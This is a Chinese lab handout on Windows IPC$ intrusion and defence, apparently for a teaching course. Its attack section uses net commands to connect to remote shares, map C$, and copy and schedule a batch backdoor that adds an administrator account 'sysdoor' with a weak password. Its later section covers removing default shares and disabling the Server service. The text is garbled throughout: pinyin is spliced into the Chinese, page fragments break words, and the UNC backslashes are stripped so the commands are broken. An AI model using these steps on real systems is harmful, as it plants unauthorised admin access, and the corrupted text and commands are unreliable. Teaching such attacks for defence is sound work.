IPC$入侵防御實(shí)驗(yàn)

1、.IPC$入侵和防范實(shí)驗(yàn)一、 試驗(yàn)?zāi)康模簩W(xué)習(xí)使用windows系統(tǒng)自帶IPC$有關(guān)的的網(wǎng)絡(luò)管理和控制命令，鞏固對(duì)所學(xué)知識(shí)的理解。 二、試驗(yàn)內(nèi)容：通過使用windows系統(tǒng)自帶的IPC$有關(guān)的網(wǎng)絡(luò)管理和控制命令，觀看其結(jié)果并進(jìn)行分析，加深對(duì)這些工具的理解和靈活運(yùn)用。三、試驗(yàn)環(huán)境： （1）安裝WINDOWS NT 或WINDOWS 2000以上版本的操作系統(tǒng)。 （2）已開放IPC$共享。 （3）已知遠(yuǎn)程主機(jī)IP地址。 （4）已知遠(yuǎn)程主機(jī)的管理員帳號(hào)和密碼（IPC$空連接除外） 其中遠(yuǎn)程主機(jī)所需條件： 1、安裝WINDOWS NT 或WINDOWS 2000以上版本的操作系統(tǒng)。 2、已開放IPC$共

2、享。 3、已啟動(dòng)SERVER服務(wù)。四、試驗(yàn)步驟： 啟動(dòng)命令行控制臺(tái)（虛擬機(jī)和本地機(jī)） 單擊“開始”“運(yùn)行”，在“運(yùn)行”對(duì)話框中鍵入：“CMD“命令啟動(dòng)命令行控制臺(tái)。 查看IPC$共享是否開放：CmdNet share 在虛擬機(jī)上建立用戶，并把用戶加入administators組中 Net user 用戶名 密碼 /add Net localgroup administrators 用戶名/add Net localgroup adminstrators 建立IPC$連接 在命令行提示符下鍵入如下命令： Net use IP地址ipc$ “密碼”/user:用戶名如：Net use IP地址ip

3、c$ “12345”/user:administrator映射網(wǎng)絡(luò)驅(qū)動(dòng)器 成功建立了IPC$連接后，在命令行提示符下鍵入命令： Net use 本地盤符 IP地址共享名如：Net use z: 192.168.1.3c$ 該命令的執(zhí)行結(jié)果是將目標(biāo)主機(jī)的C盤映射為本地機(jī)的z盤。映射成功后，就可以對(duì)目標(biāo)主機(jī)進(jìn)行操作和控制了。COPY文件 命令格式：Copy 本地文件的路徑文件名 遠(yuǎn)程主機(jī)IP遠(yuǎn)程主機(jī)文件路徑。如：Copy c:/bake.bat 192.168.1.3c$ 斷開IPC$連接 在命令行提示符下鍵入命令： Net use IP地址IPC$/del思考：如果不知道遠(yuǎn)程主機(jī)的用戶名和密碼，

4、可以連接上遠(yuǎn)程主機(jī)嗎？可以實(shí)現(xiàn)以上哪些操作？ 留后門 （1）打開記事本編寫批處理程序 建立后門的批處理程序?yàn)椋?Net user sysdoor 12345 /add Net localgroup administrator sysdoor /add 其中“Net user sysdoor 12345 /add“命令添加密碼為12345的帳號(hào)sysdoor。“Net localgroup administrator sysdoor /add” 命令則把sysdoor帳號(hào)添加到管理員組中去。 后門程序編寫好后，需要起個(gè)名字，在我們的實(shí)驗(yàn)中將它取名為“bake.bat”。 （2）批處理程序建立好后

5、，我們通過IPC$將它拷貝到目標(biāo)主機(jī)，命令格式為：Copy 本地文件的路徑文件名 遠(yuǎn)程主機(jī)IP遠(yuǎn)程主機(jī)文件路徑。 Copy c:/bake.bat 192.168.1.3c$ （3）在命令行提示符下鍵入命令：net time ip，查看系統(tǒng)時(shí)間 At 192.168.1.3 14:10 c:bake.bat 斷開IPC$連接 在命令行提示符下鍵入命令： Net use 192.168.1.3IPC$ /del 這條命令的執(zhí)行結(jié)果是斷開與遠(yuǎn)程主機(jī)192.168.1.3的IPC$連接。我們也可以用Net use */del斷開所有的連接。 IPC$空連接 如果我們要與遠(yuǎn)程主機(jī)192.168.1.3

6、建立IPC$空連接，則在命令行提示符下鍵入命令： Net use 192.168.1.3 “ ” /user: Ipc$防御試驗(yàn)二IPC$的安全解決方案 刪除默認(rèn)共享(1)在命令符下鍵入Net share 命令查看系統(tǒng)當(dāng)前的默認(rèn)共享。 (2)打開記事本，編寫批處理程序，如下： Net share IPC$ /del Net share e$ /del Net share c$ /del Net share d$ /del(3) 保存為delshare.bat(4) 單擊C:Documents and SettingsAdministrator開始菜單程序啟動(dòng)，將delshare.bat文件拷貝

7、到它的啟動(dòng)組中。做完前面的事情后，重新啟動(dòng)計(jì)算機(jī)，然后用Net share 命令驗(yàn)證一下系統(tǒng)中的默認(rèn)共享資源是否已經(jīng)被全部刪除，如果沒有，還有哪些？嘗試在本地機(jī)中用Net use IP地址ipc$ “密碼”/user:用戶名的命令是否還能建立IPC$連接？ 關(guān)閉SERVER服務(wù)單擊“控制面板”“管理工具”“服務(wù)”打開服務(wù)管理器，在服務(wù)列表中找到“Server”服務(wù)，用右鍵單擊該服務(wù)，在彈出的菜單中選擇”屬性“，然后選擇”禁止“選項(xiàng)就完成了關(guān)閉操作。重啟計(jì)算機(jī)后修改生效。再次驗(yàn)證：嘗試在本地機(jī)中用Net use IP地址ipc$ “密碼”/user:用戶名的命令是否還能建立IPC$連接？如果不能

8、，將返回什么錯(cuò)誤信息。 給系統(tǒng)設(shè)置一個(gè)安全的密碼IPC$入侵一般都是通過掃描弱口令開始的，一旦入侵者掃描不到任何口令，IPC$入侵就無(wú)從談起。1. 啟動(dòng)命令行控制臺(tái)（虛擬機(jī)和本地機(jī)）2. 查看IPC$共享是否開放：3.在虛擬機(jī)上建立用戶，并把用戶加入administators組中4.建立IPC$連接5.映射網(wǎng)絡(luò)驅(qū)動(dòng)器6.COPY文件7. 斷開IPC$連接 8 .(1)打開記事本編寫批處理程序,建立后門的批處理程序.（2）批處理程序建立好后，我們通過IPC$將它拷貝到目標(biāo)主機(jī)（3）在命令行提示符下鍵入命令：net time ip，查看系統(tǒng)時(shí)間(4) 斷開IPC$ 連接(5)Net use */del斷開所有的連接。(6)IPC$空連接Ipc$防御試驗(yàn)二IPC$的安全解決方案1.刪除默認(rèn)共享(1)在命令符下鍵入Net share 命令查看系統(tǒng)當(dāng)前的默認(rèn)共享。(2)打開記事本，編寫批處理程序 (3) 保存為delshare.bat(4)將delsha